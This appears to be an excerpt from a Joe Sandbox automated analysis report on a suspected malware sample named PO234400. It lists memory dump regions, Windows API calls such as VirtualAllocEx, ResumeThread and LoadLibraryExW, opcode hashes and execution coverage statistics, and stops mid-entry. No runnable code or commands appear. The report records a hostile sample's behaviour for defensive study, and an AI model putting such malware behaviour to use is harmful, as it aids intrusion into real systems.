                                                    • Instruction Fuzzy Hash: BC21C4B590024D9FDB10CFAAD984ADEBFF9FB48720F14841AE918A3350D374A954CFA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07B17C06
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1388192273.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7b10000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 7094dab7ff52a43d3a644369f42f8b792b61178df635d63f6d40da63c2d18553
                                                    • Instruction ID: 658f8bfbe75c4ce1fc2de3ee7def6bcf10cebdb975aacaaa9da58c6476487c9b
                                                    • Opcode Fuzzy Hash: 7094dab7ff52a43d3a644369f42f8b792b61178df635d63f6d40da63c2d18553
                                                    • Instruction Fuzzy Hash: 5E1126B6800249DFDB10DFA9C945BEEBBF5FF48320F14881AE559A7250CB759544CFA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,012CB079,00000800,00000000,00000000), ref: 012CB28A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1377190570.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_12c0000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: 2e58d0d5ff811e0925f385612e985c42fc0f6f5dcc887c7ba3a424b4b26414a7
                                                    • Instruction ID: 52ba1b14e8f81315c896120656447229744d5f4d1355dfa4a7d05f52bedd1002
                                                    • Opcode Fuzzy Hash: 2e58d0d5ff811e0925f385612e985c42fc0f6f5dcc887c7ba3a424b4b26414a7
                                                    • Instruction Fuzzy Hash: 9D1103B68003099FDB10DF9AC445BAEFBF9EB89720F10852ED619A7200C375A545CFA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,012CB079,00000800,00000000,00000000), ref: 012CB28A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1377190570.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_12c0000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: a259bb194d28043e62e9a08f69f8f8763fa5af50a7f94e711166c8072a8a0199
                                                    • Instruction ID: ce4ce72287de7416cd3c73045603785bc62f2787162824dd5525b99de7669adf
                                                    • Opcode Fuzzy Hash: a259bb194d28043e62e9a08f69f8f8763fa5af50a7f94e711166c8072a8a0199
                                                    • Instruction Fuzzy Hash: 431144B68003498FDB10CFAAC445BEEFBF5AB88720F10841EDA18A7200C375A505CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07B17C06
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1388192273.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7b10000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: dcc172b4165c2ae5958e324253fb0d6a9531bb8dfcffeb24e3c59bbf3f4acb59
                                                    • Instruction ID: 0ddf99d1e495e7d948c680e3b8e2c65fc19f9a05f7e85395d20ac20e2668cb2e
                                                    • Opcode Fuzzy Hash: dcc172b4165c2ae5958e324253fb0d6a9531bb8dfcffeb24e3c59bbf3f4acb59
                                                    • Instruction Fuzzy Hash: 9A1126B58003499FDB10DFAAC844BEEBBF5EF88320F14881AE515A7250CB759540CFA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1388192273.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7b10000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: cf8b2da2caadb423397f7f2ee0fc5b0bbad99908ac2ee6aa99abce13b6ad2864
                                                    • Instruction ID: eaaea66ec8038bf0ec34f794a0862f07570178197ec4568746fe073b2a5c7c00
                                                    • Opcode Fuzzy Hash: cf8b2da2caadb423397f7f2ee0fc5b0bbad99908ac2ee6aa99abce13b6ad2864
                                                    • Instruction Fuzzy Hash: 501158B1C003498FDB10DFAAC4457EEBBF5EB88220F20881AD519A7250CB399645CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1388192273.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7b10000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: d27a4389cc1d85057045595f215dad35c0009c610be56942c3eb0380aa166bb2
                                                    • Instruction ID: 20bbd81bae03adc71dca23eee2498a38ee826b612ae200b5c5869d9dac9ebaf7
                                                    • Opcode Fuzzy Hash: d27a4389cc1d85057045595f215dad35c0009c610be56942c3eb0380aa166bb2
                                                    • Instruction Fuzzy Hash: 6F1128B1D003498FDB10DFAAC4457AEFBF9AB88620F24845AD519A7240CB75A544CB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 07B1B065
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1388192273.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7b10000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: MessagePost
                                                    • String ID:
                                                    • API String ID: 410705778-0
                                                    • Opcode ID: 0014f4a8012ed69d88f6a74c5db2bf3e1c37262b1be03bf61418bbd84491af6b
                                                    • Instruction ID: aeef93c1c7fd722d720db1d7223397ee3da6cab4e48437fa990865e5ed143b5c
                                                    • Opcode Fuzzy Hash: 0014f4a8012ed69d88f6a74c5db2bf3e1c37262b1be03bf61418bbd84491af6b
                                                    • Instruction Fuzzy Hash: CA11E3B58003499FDB20DF9AC489BDFBBF8FB48720F10845AE514A7200C375A944CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 012CAFFE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1377190570.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_12c0000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: 567583c69b6fb3193eb1a0a642ce1a03b1d45e1f495786fe607b136bb116de4e
                                                    • Instruction ID: 07cd5a48c90007142413cc7a60d1bd2e39b1e29f4aff3303daaa0335266912f7
                                                    • Opcode Fuzzy Hash: 567583c69b6fb3193eb1a0a642ce1a03b1d45e1f495786fe607b136bb116de4e
                                                    • Instruction Fuzzy Hash: DF1113B5C003498FDB14DF9AC444BDEFBF4AB88724F10851AD529A7210D375A545CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 07B1B065
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1388192273.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7b10000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: MessagePost
                                                    • String ID:
                                                    • API String ID: 410705778-0
                                                    • Opcode ID: f9e76866f9b7e7a8659fe2c8d6cb1b5c4166ef94249657110ff338ef1d4a9b0d
                                                    • Instruction ID: 9e4111b15fe40e1a8238ed6eb0b0ed37818b1db885442f317d940b62dd1f3e30
                                                    • Opcode Fuzzy Hash: f9e76866f9b7e7a8659fe2c8d6cb1b5c4166ef94249657110ff338ef1d4a9b0d
                                                    • Instruction Fuzzy Hash: DB11E0B58003499FDB20DF9AC884BDEBBF8EB48320F24845AE558A7641C375A544CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1376536439.0000000000FFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ffd000_PO234400.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b3447ae3d993e059898b4ae0b05b8477d05c64360068c1d59cf2a7caa037d2cf
                                                    • Instruction ID: 3050fc874fc35a315c93c8c76a7eaf0054b00735950e6af143a8e5500179c0fe
                                                    • Opcode Fuzzy Hash: b3447ae3d993e059898b4ae0b05b8477d05c64360068c1d59cf2a7caa037d2cf
                                                    • Instruction Fuzzy Hash: 89212876504308DFDB04DF10D9C4B26BB66FF94324F20C169DA090B266C336E856EBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1376642947.000000000100D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0100D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_100d000_PO234400.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cfcbd1aa7777e916122958230ab913f95130be3fb1c7cd25cc1e1529544dad9a
                                                    • Instruction ID: 1611bd7ffc5391a6659ef8f79afbdcaad339cfd654b44e4bece940b5151cc227
                                                    • Opcode Fuzzy Hash: cfcbd1aa7777e916122958230ab913f95130be3fb1c7cd25cc1e1529544dad9a
                                                    • Instruction Fuzzy Hash: 68212571604300EFEB02DF94D9C0B25BBA1FB94324F20C5ADE8894B282C736D406CB72
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1376642947.000000000100D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0100D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_100d000_PO234400.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c2eb7c3e28b3080cb6ae328941ac7bb3badf04233c4dc0a23616aba99747136f
                                                    • Instruction ID: 5c120c53c8e006ffea3f3d1ddd8f338abec317db8f14a8e74b0fc122f76d908c
                                                    • Opcode Fuzzy Hash: c2eb7c3e28b3080cb6ae328941ac7bb3badf04233c4dc0a23616aba99747136f
                                                    • Instruction Fuzzy Hash: 3121CF756043049FEB16DF94D984B16BBA5EB84224F20C5A9E98E4B286C33AD446CB72
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1376536439.0000000000FFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ffd000_PO234400.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                    • Instruction ID: 1d0702240b352fb219a91f6a09f7d55b1c070f9b0f5e8e5d1ce8aeb0fa0d25fe
                                                    • Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                    • Instruction Fuzzy Hash: 5E110376904244CFCB05CF00D5C0B26BF72FF94324F24C2A9D9090B666C33AE856DBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1376642947.000000000100D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0100D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_100d000_PO234400.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                    • Instruction ID: bb1012135acf64d8c48323a6a6feca132399cd31976b01ee452f4a5345f2ed0b
                                                    • Opcode Fuzzy Hash: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                    • Instruction Fuzzy Hash: 1E11BE75504280CFDB12CF94D5C4B15BBA2FB44324F24C6AAE8494B696C33AD40ACB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1376642947.000000000100D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0100D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_100d000_PO234400.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                    • Instruction ID: c8c86d44b429e725fbb8a604013f87afe0d76a9b81c106ff4b208f444f95d3cc
                                                    • Opcode Fuzzy Hash: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                    • Instruction Fuzzy Hash: 3D11BB75504280DFDB02CF98C5C0B15BBA2FB84224F24C6ADD8894B696C33AD40ACB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1376536439.0000000000FFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ffd000_PO234400.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6f2cdef6cbe2cf0dd777ad49689a56ebee77c3cd765a1104ee58a8f10b44c72f
                                                    • Instruction ID: 88806ed9a1f5d985cfbfaf0db68fdf56f9c8293c592fb8e662c185c50182b694
                                                    • Opcode Fuzzy Hash: 6f2cdef6cbe2cf0dd777ad49689a56ebee77c3cd765a1104ee58a8f10b44c72f
                                                    • Instruction Fuzzy Hash: 2D01A2734053489BE7206A25CC84B76FFD9EF41735F28C55AEE094E2A6C3799840DBB2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1376536439.0000000000FFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ffd000_PO234400.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6aad13a327a825f2eb2d99e3bc14a5b0b18a260033078373bd866cc39744088c
                                                    • Instruction ID: 975d21e395bc07474f0e6e614ecbeb9d1db1f8b3e184a58214c5a1d2532b7643
                                                    • Opcode Fuzzy Hash: 6aad13a327a825f2eb2d99e3bc14a5b0b18a260033078373bd866cc39744088c
                                                    • Instruction Fuzzy Hash: D0F062724053489EE7109A16DD84B72FFE8EF51735F18C45AED184F2A6C279A844CBB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1388192273.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7b10000_PO234400.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 72f70ba87b75dfc700eebd1c7c0e8414ec5fb696ac35c4bbd81989478172c4a4
                                                    • Instruction ID: 76ddec34e725ea48621a4468b902f5dcaa14a1d36131de7d09dda1d0f87c5a1f
                                                    • Opcode Fuzzy Hash: 72f70ba87b75dfc700eebd1c7c0e8414ec5fb696ac35c4bbd81989478172c4a4
                                                    • Instruction Fuzzy Hash: 32E1FBB4E00219CFDB14DFA8C5909AEFBB2FF89315F2481A9D418AB355D731A942CF60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1388192273.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7b10000_PO234400.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3b24e3b44f25013f2e63603b5f9b5075a45a5c1d9e2c9cec898104947834eda5
                                                    • Instruction ID: 89d0c7b7717698d465aa922599bc27bd54668f16d5a753d130d2fd85f1775481
                                                    • Opcode Fuzzy Hash: 3b24e3b44f25013f2e63603b5f9b5075a45a5c1d9e2c9cec898104947834eda5
                                                    • Instruction Fuzzy Hash: D4E11CB4E00219CFDB24DFA9C580AAEFBB2FF89305F648169D418AB355D731A941CF60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1388192273.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7b10000_PO234400.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 96c381589786575d5263279765805bec6a66f4190968ba44de36bd483335c2b5
                                                    • Instruction ID: 284ce698b292527ef6689c6b7215b1878bde8e91c3673d2a296c376ebdcc5302
                                                    • Opcode Fuzzy Hash: 96c381589786575d5263279765805bec6a66f4190968ba44de36bd483335c2b5
                                                    • Instruction Fuzzy Hash: D2E11DB4E00219CFDB14DFA9C5909AEFBB2FF89305F248169D818A7355DB31A942CF60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1388192273.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7b10000_PO234400.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e886b980beae77ead8bc78bea54c278cc7ac2f399132da0dc24f174092d85f5f
                                                    • Instruction ID: a83b24c65bfed64961c1206d02d8eb11fdbe7c97d81639a7a9652af06e38d868
                                                    • Opcode Fuzzy Hash: e886b980beae77ead8bc78bea54c278cc7ac2f399132da0dc24f174092d85f5f
                                                    • Instruction Fuzzy Hash: 1AE1FCB4E00219CFDB14DFA9C5909AEFBB2FF89305F2481A9D418A7355DB31A941CF61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1388192273.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7b10000_PO234400.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c0ee1c0abd00d79b4f287e489472f7bd27689bfaa275d129641cffb8fd696e8f
                                                    • Instruction ID: 2ac986546ea9248494effe0ea980dc2e371dd198643d9f9f3202cb9bd26bb1cc
                                                    • Opcode Fuzzy Hash: c0ee1c0abd00d79b4f287e489472f7bd27689bfaa275d129641cffb8fd696e8f
                                                    • Instruction Fuzzy Hash: 6CE1FCB4E002198FDB24DF99C5909AEFBB2FF89305F64C169D418AB355D731A941CF60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1377190570.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_12c0000_PO234400.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 68e545555dc20f7cd9b80972cbd397caf1c2a35e0ab0a720cb609373a47ac4bd
                                                    • Instruction ID: da8e7f8c0d400d60c2fd0958a7178f0baddce99cc17ab40fc6b1d238b01cb5c0
                                                    • Opcode Fuzzy Hash: 68e545555dc20f7cd9b80972cbd397caf1c2a35e0ab0a720cb609373a47ac4bd
                                                    • Instruction Fuzzy Hash: 8AA18036E1021A8FCF15DFB4C5405AEBBB3FF84700B25866EEA15AB265DB31D909CB40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1388192273.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7b10000_PO234400.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cd0399b8e78ca3b9dc21dfd844dc4b1c219d4a677bd897e578009bd9629aa655
                                                    • Instruction ID: 8c4a944738e353266890ff33317738ecc6fbc2aaa0a3405fd3fa8af7d1a4ca85
                                                    • Opcode Fuzzy Hash: cd0399b8e78ca3b9dc21dfd844dc4b1c219d4a677bd897e578009bd9629aa655
                                                    • Instruction Fuzzy Hash: 20513DB0E04219CFDB14DFA9C5545AEBBF2FF89304F2481AAD458AB215D7319A41CFA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Execution Graph

Execution Coverage: 12.5%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 156
Total number of Limit Nodes: 16

Control-flow Graph
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2611001531.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6910000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: 3e5e4e7b78305b3ce61de15494cca85b33096bd2257bec2984712abc68ccafc9
                                                    • Instruction ID: eb3841f25fb3dd9edd78d807189f294e612a5cbba4acbb35b6c762ee66e13e3e
                                                    • Opcode Fuzzy Hash: 3e5e4e7b78305b3ce61de15494cca85b33096bd2257bec2984712abc68ccafc9
                                                    • Instruction Fuzzy Hash: 6D714670A00B09CFDB64DF6AD44475ABBF5FF88204F20892DD49ADBA50D778E846CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

Control-flow Graph
                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0691FAC2
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2611001531.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6910000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID:
                                                    • API String ID: 716092398-0
                                                    • Opcode ID: dff50af6481fe7f75560a2572d56d8324de873898d2f1bfdc29d10ca544469e0
                                                    • Instruction ID: 1bc3ade7b8fb6ddfc45abee73f540ba33fd87f5fa17c907fb1f3f84194824eab
                                                    • Opcode Fuzzy Hash: dff50af6481fe7f75560a2572d56d8324de873898d2f1bfdc29d10ca544469e0
                                                    • Instruction Fuzzy Hash: 0051BFB1D0034D9FDB14CFA9C884ADEBBB5BF88314F24812AE819AB250D775A845CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

Control-flow Graph
                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0691FAC2
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2611001531.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6910000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID:
                                                    • API String ID: 716092398-0
                                                    • Opcode ID: dcc3028bd3469a76256a527b2294e17e945307788a851ebb5d6e0783204d89e1
                                                    • Instruction ID: d6e7096b5c280f3034cee63d788b97e4c64ee69182d93eb989f141d0ffb3f38f
                                                    • Opcode Fuzzy Hash: dcc3028bd3469a76256a527b2294e17e945307788a851ebb5d6e0783204d89e1
                                                    • Instruction Fuzzy Hash: C341ADB1D0034D9FDB14CF9AC884ADEBBF5BF88314F24812AE819AB250D775A945CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

Control-flow Graph
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2607455879.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1600000_PO234400.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c4da9162d1b777e2aeb0859bf5e8e38758954e222a11a7f9ee8ec9a9e0cee298
                                                    • Instruction ID: a3dbadb303c2878f5ab955022baa1f69bbebaf3ad129ec77c34fdc620b9b4bb5
                                                    • Opcode Fuzzy Hash: c4da9162d1b777e2aeb0859bf5e8e38758954e222a11a7f9ee8ec9a9e0cee298
                                                    • Instruction Fuzzy Hash: FC41B3786463449FE715CF65E988A693BB3FF88311F204169EA518BBC6DB380941CF11
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

Control-flow Graph
                                                    APIs
                                                    • LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 0691C85A
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2611001531.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6910000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: f7c05064a5e342394a8d676d5684699f7c7931f8abc7facac41e679459356e33
                                                    • Instruction ID: dd1a13d8cfb9a27485873b61c4b975167cee8663b256d0b7d4bddf2f153c9927
                                                    • Opcode Fuzzy Hash: f7c05064a5e342394a8d676d5684699f7c7931f8abc7facac41e679459356e33
                                                    • Instruction Fuzzy Hash: 182118B6D003099FDB10DF9AD844ADEFBF8EB88320F20802AD515A7600C779A545CFA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

Control-flow Graph
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0160C19F
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2607455879.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1600000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: 2923663e7de625834149537683cd6727f6bcfa46430fa3cda549371bdb405e71
                                                    • Instruction ID: d4957a0bb81b191d4f135e966a160a8acc340ffc6453e84341675fb3d46075d3
                                                    • Opcode Fuzzy Hash: 2923663e7de625834149537683cd6727f6bcfa46430fa3cda549371bdb405e71
                                                    • Instruction Fuzzy Hash: E621E2B5D002499FDB10CFAAD884AEEBFF5FB48311F24845AE918A3750C378A945CF60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

Control-flow Graph
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0160C19F
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2607455879.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1600000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: d10dedfad26f99da47c527bbda229c5f5417a154b6831a5005c6edb7070ff157
                                                    • Instruction ID: 520fd8b2ee97ef6f32253bfae6d83c3da1757489bdea66790d4a1669a2d796a7
                                                    • Opcode Fuzzy Hash: d10dedfad26f99da47c527bbda229c5f5417a154b6831a5005c6edb7070ff157
